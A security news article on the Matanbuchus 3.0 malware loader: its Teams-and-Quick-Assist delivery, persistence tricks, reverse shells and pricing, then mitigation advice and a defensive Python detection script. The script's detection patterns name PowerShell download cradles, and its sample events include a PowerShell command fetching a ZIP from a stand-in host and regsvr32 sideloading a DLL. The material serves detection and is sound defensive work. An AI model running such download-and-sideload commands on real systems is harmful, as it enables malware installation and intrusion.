Matanbuchus 3.0 Emerges To Facilitate Ransomware Infections
Cybersecurity experts at Morphisec report that Matanbuchus, launched as malware-as-a-service (MaaS) in 2021, has returned with an upgraded and more capable version, Matanbuchus 3.0. The service rents attackers a loader that installs additional malicious tools on Windows computers: a sophisticated malware loader for hire.
In mid‑July 2025, attackers released Matanbuchus 3.0, an upgraded version featuring stronger stealth, persistence, and delivery tactics. Morphisec warns that this update poses a heightened threat to enterprises and government departments.
Attackers initiate the infection through social engineering. Recently, they placed fake Microsoft Teams calls pretending to be IT support. During the call, they persuaded an employee to launch Quick Assist and run a PowerShell command to download code. That command fetched a ZIP file containing a modified Notepad++ updater ("GenericUpdater.exe"), a custom XML, and a malicious DLL with the Matanbuchus loader.
Morphisec CTO Michael Gorelik explained that victims are carefully targeted and persuaded to execute a script that triggers the download of a malicious archive containing the renamed updater and malicious loader.
Once loaded, Matanbuchus 3.0 begins gathering system details such as running processes, installed applications, Windows hotfixes, and security tools. It disguises its command-and-control traffic as ordinary traffic by using a Skype-like user agent and, depending on the variant, encrypted HTTP or DNS channels.
For persistence, it sideloads the DLL via regsvr32, creates scheduled tasks through COM manipulation, and injects shellcode to ensure it starts on reboot. It also renames and relocates files using a serial-ID algorithm derived from registry and volume data.
Matanbuchus 3.0's New Features
This version introduced several new capabilities:
- In-memory execution to avoid writing to disk
- Stronger obfuscation and encryption (e.g., using Salsa20 instead of older methods)
- Support for WQL queries to fetch security configurations
- CMD and PowerShell reverse shells
- Execution of EXE, DLL, MSI, or shellcode payloads
- Techniques like process hollowing via MSIExec
- Indirect system calls and anti-sandbox checks (e.g., Russian-language filtering, WOW64 detection)
Gorelik noted,
The Matanbuchus 3.0 Malware-as-a-Service has evolved into a sophisticated threat. This updated version introduces advanced techniques such as improved communication protocols, in-memory stealth, enhanced obfuscation, and support for WQL queries, CMD, and PowerShell reverse shells. It collects detailed system data, including EDR security controls, to tailor subsequent attacks, which may culminate in ransomware deployment. The loader's ability to execute regsvr32, rundll32, msiexec, or process hollowing commands underscores its versatility, making it a significant risk to compromised systems.
Matanbuchus 3.0 is expensive. The HTTP-based version rents for 10,000 USD per month, while the more covert DNS-based version costs 15,000 USD per month. As DarkReading's Nate Nelson noted, the DNS version offers extra stealth and resists simple blocking, supporting smaller data packets for commands rather than full binaries.
Typically, a Matanbuchus 3.0 attack begins with a social engineering campaign. A fake Microsoft Teams call masquerading as IT support tricks the user into running Quick Assist and a PowerShell script. The victim then downloads an archive with a deceptively labeled Notepad++ updater and loader DLL.
Once the updater and loader are installed, the malware collects system and security information to tailor its actions. It sends that data to a command-and-control server over encrypted HTTP or DNS channels and awaits instructions. If the expected instructions arrive, the malware installs one or more payloads, including additional malware, a reverse shell, or ransomware. It maintains persistence using living-off-the-land tools, scheduled tasks, shellcode, and code obfuscation.
DarkReading referred to Matanbuchus as "the Rolls‑Royce of malware loaders," stressing its elite features and focus on high-value targets over mass infections. Matanbuchus can present a significant threat to both enterprises and government departments, given the following factors:
- Widespread Teams use: Many organizations rely on Teams for daily work, making it an ideal attack vector.
- In-memory stealth: Since payloads don't touch the disk, traditional antivirus and EDR tools may miss them.
- LOLBins help hide activity: Using native Windows tools makes detection significantly harder.
- MaaS lowers skill barriers: Attackers can deploy fearsome tools without technical skills or custom development.
Morphisec's analysis reveals Matanbuchus 3.0 as a polished and fearsome MaaS loader. It combines social engineering via trusted channels, in-memory execution and obfuscation, abuse of legitimate Windows tools (LOLBins), and sophisticated persistence and communication techniques into resilient, hard-to-detect malware. Matanbuchus 3.0 is a much-improved threat that needs to be taken seriously.
Morphisec advises organizations and users to take these concrete steps to help mitigate and prevent Matanbuchus infection:
- Educate staff to be skeptical of unexpected external Teams calls—even if they originate from familiar names.
- Restrict Quick Assist usage with strict permissions and monitoring.
- Monitor logs for unusual use of regsvr32, rundll32, msiexec, scheduled tasks, and COM objects.
- Use in-memory malware detection tools that can inspect runtime behavior.
- Enforce strict download policies: only allow signed installers from trusted sources.
- Regularly patch systems and EDR agents to close vulnerabilities.
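The log-monitoring advice above can be turned into concrete rules. The following Python is an added example, not code from Morphisec or PCrisk: it runs a handful of checks over constructed endpoint telemetry shaped like Sysmon Event ID 1 (process creation) and Windows Security Event ID 4698 (scheduled task created). The field names, the sample events, and the assumption that the Quick Assist helper process is named quickassist.exe are all the example's own; adapt them to your SIEM's schema.

```python
"""Detection sketch for the LOLBin and Quick Assist abuse described above.

Added example, not Morphisec's or PCrisk's code. Input records are constructed
here to resemble Sysmon Event ID 1 (process creation) and Windows Security
Event ID 4698 (scheduled task created) fields.
"""
import re
from typing import Dict, List, Tuple

# Paths an unprivileged user can write to. A signed Windows binary such as
# regsvr32 or msiexec loading a DLL/MSI from here deserves review.
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)"
    r"|ProgramData|Users\\Public|Windows\\Temp)\\",
    re.IGNORECASE,
)
# PowerShell cmdlets and .NET classes commonly used to pull content from the network.
DOWNLOAD_CRADLE = re.compile(
    r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString"
    r"|DownloadFile|Net\.WebClient|Start-BitsTransfer|\bcurl\b",
    re.IGNORECASE,
)
LOLBINS = {"regsvr32.exe", "rundll32.exe", "msiexec.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Assumption: the Quick Assist helper process is named quickassist.exe.
QUICK_ASSIST = "quickassist.exe"


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def check_process(rec: Dict[str, str]) -> List[str]:
    """Rules for a process-creation event; returns the names of rules that fired."""
    image = basename(rec.get("Image", ""))
    parent = basename(rec.get("ParentImage", ""))
    cmd = rec.get("CommandLine", "")
    hits = []
    # A shell spawned under a Quick Assist session that reaches out to the
    # network matches the fake-IT-support delivery step.
    if image in SHELLS and parent == QUICK_ASSIST and DOWNLOAD_CRADLE.search(cmd):
        hits.append("quick_assist_download_cradle")
    # regsvr32/rundll32/msiexec loading from a user-writable directory covers
    # DLL sideloading and MSI-based staging.
    if image in LOLBINS and USER_WRITABLE.search(cmd):
        hits.append(f"{image[:-4]}_user_writable_path")
    # msiexec fetching a package over HTTP(S) rather than from a local store.
    if image == "msiexec.exe" and re.search(r"https?://", cmd, re.IGNORECASE):
        hits.append("msiexec_remote_package")
    return hits


def check_task(rec: Dict[str, str]) -> List[str]:
    """Rules for a scheduled-task-created event (Security 4698).

    Tasks registered through COM never show a schtasks.exe process, so the
    task's own action is the thing to inspect."""
    command = rec.get("Command", "")
    args = rec.get("Arguments", "")
    hits = []
    if basename(command) in LOLBINS:
        hits.append("task_runs_lolbin")
    if USER_WRITABLE.search(command + " " + args):
        hits.append("task_targets_user_writable_path")
    return hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Run every rule over a list of events; returns (event id, rule) pairs."""
    findings = []
    for rec in events:
        rules = check_task(rec) if rec.get("EventType") == "task_created" else check_process(rec)
        findings.extend((rec["Id"], rule) for rule in rules)
    return findings


# Constructed sample telemetry: three events modelled on the chain described
# in the article and two benign ones that must not fire.
SAMPLE_EVENTS = [
    {"Id": "e1", "EventType": "process_create",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\QuickAssist\QuickAssist.exe",
     "CommandLine": r'powershell.exe -Command "Invoke-WebRequest http://update.example.invalid/pkg.zip -OutFile C:\Users\alice\AppData\Local\Temp\pkg.zip"'},
    {"Id": "e2", "EventType": "process_create", "Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\pkg\GenericUpdater.exe",
     "CommandLine": r"regsvr32.exe /s C:\Users\alice\AppData\Local\Temp\pkg\loader.dll"},
    {"Id": "e3", "EventType": "process_create", "Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"regsvr32.exe /s C:\Windows\System32\vbscript.dll"},
    {"Id": "e4", "EventType": "process_create",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -Command Get-Process"},
    {"Id": "e5", "EventType": "task_created", "TaskName": r"\Microsoft\Windows\Updater",
     "Command": r"C:\Windows\System32\regsvr32.exe", "Arguments": r"/s C:\ProgramData\svc\loader.dll"},
]

if __name__ == "__main__":
    for event_id, rule in scan(SAMPLE_EVENTS):
        print(f"{event_id}: {rule}")
```

Run against the constructed events, the scan flags the Quick Assist download cradle (e1), regsvr32 loading a DLL from the user's Temp directory (e2), and a scheduled task whose action is a LOLBin pointed at ProgramData (e5), while the legitimate regsvr32 and PowerShell invocations (e3, e4) stay quiet. The path and parent-process checks are deliberately narrow so the rules stay useful in an enterprise where regsvr32 and msiexec run constantly for benign reasons; tune USER_WRITABLE and the parent list to your environment.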
Karolis Liucveikis
Experienced software engineer, passionate about behavioral analysis of malicious apps
Author and general operator of PCrisk's News and Removal Guides section. Co-researcher working alongside Tomas to discover the latest threats and global trends in the cyber security world. Karolis has over 8 years of experience in this field. He attended Kaunas University of Technology and graduated with a degree in Software Development in 2017. Extremely passionate about the technical aspects and behavior of various malicious applications.
PCrisk security portal is brought by a company RCS LT.
Joined forces of security researchers help educate computer users about the latest online security threats. More information about the company RCS LT.
Our malware removal guides are free. However, if you want to support us you can send us a donation.